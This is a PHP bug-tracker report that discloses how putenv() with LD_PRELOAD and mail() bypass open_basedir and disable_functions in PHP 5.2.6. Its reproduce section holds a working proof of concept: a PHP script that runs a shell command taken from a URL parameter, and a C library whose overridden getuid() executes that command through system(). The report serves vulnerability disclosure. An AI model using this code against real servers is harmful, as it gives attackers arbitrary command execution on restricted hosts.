From: gat3way at gat3way dot eu
Operating system: Linux
PHP version: 5.2.6
PHP Bug Type: Safe Mode/open_basedir
Bug description: putenv()+mail() allows for open_basedir bypass and "disabled"
functionality
Description:
------------
safe_mode is safe, but the mail() function should check environment
variables IMO.
e.g. you can putenv("LD_PRELOAD=evil_library.so"); and since mail() calls
/usr/bin/mail if your library exports function like getuid() you can bypass
open_basedir restrictions and restrictions on program execution, etc.
If you need some more info, please contact me at:
[EMAIL PROTECTED]
Milen Rangelov
Reproduce code:
---------------
A PHP script:
<?php
putenv("LD_PRELOAD=/var/www/a.so");
$a=fopen("/var/www/.comm","w");
fputs($a,$_GET["c"]);
fclose($a);
mail("a","a","a","a");
$a=fopen("/var/www/.comm1","r");
while (!feof($a))
{$b=fgets($a);echo $b;}
fclose($a); ?>
A simple library:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int getuid()
{
char *en;
char *buf=malloc(300);
FILE *a;
unsetenv("LD_PRELOAD");
a=fopen("/var/www/.comm","r");
buf=fgets(buf,100,a);
write(2,buf,strlen(buf));
fclose(a); remove("/var/www/.comm");
rename("/var/www/a.so","/var/www/b.so");
buf=strcat(buf," > /var/www/.comm1");
system(buf);
rename("/var/www/b.so","/var/www/a.so");
free(buf);return 0;
}
Expected result:
----------------
execute arbitrary commands even though we have:
disable_functions = dl,system,exec,passthru,shell_exec,popen
open_basedir = /var/www
Actual result:
--------------
The test was successful.
--
Edit bug report at http://bugs.php.net/?id=46741&edit=1
--
Try a CVS snapshot (PHP 5.2):
http://bugs.php.net/fix.php?id=46741&r=trysnapshot52
Try a CVS snapshot (PHP 5.3):
http://bugs.php.net/fix.php?id=46741&r=trysnapshot53
Try a CVS snapshot (PHP 6.0):
http://bugs.php.net/fix.php?id=46741&r=trysnapshot60
Fixed in CVS:
http://bugs.php.net/fix.php?id=46741&r=fixedcvs
Fixed in CVS and need be documented:
http://bugs.php.net/fix.php?id=46741&r=needdocs
Fixed in release:
http://bugs.php.net/fix.php?id=46741&r=alreadyfixed
Need backtrace:
http://bugs.php.net/fix.php?id=46741&r=needtrace
Need Reproduce Script:
http://bugs.php.net/fix.php?id=46741&r=needscript
Try newer version:
http://bugs.php.net/fix.php?id=46741&r=oldversion
Not developer issue:
http://bugs.php.net/fix.php?id=46741&r=support
Expected behavior:
http://bugs.php.net/fix.php?id=46741&r=notwrong
Not enough info:
http://bugs.php.net/fix.php?id=46741&r=notenoughinfo
Submitted twice:
http://bugs.php.net/fix.php?id=46741&r=submittedtwice
register_globals:
http://bugs.php.net/fix.php?id=46741&r=globals
PHP 4 support discontinued: http://bugs.php.net/fix.php?id=46741&r=php4
Daylight Savings: http://bugs.php.net/fix.php?id=46741&r=dst
IIS Stability:
http://bugs.php.net/fix.php?id=46741&r=isapi
Install GNU Sed:
http://bugs.php.net/fix.php?id=46741&r=gnused
Floating point limitations:
http://bugs.php.net/fix.php?id=46741&r=float
No Zend Extensions:
http://bugs.php.net/fix.php?id=46741&r=nozend
MySQL Configuration Error:
http://bugs.php.net/fix.php?id=46741&r=mysqlcfg
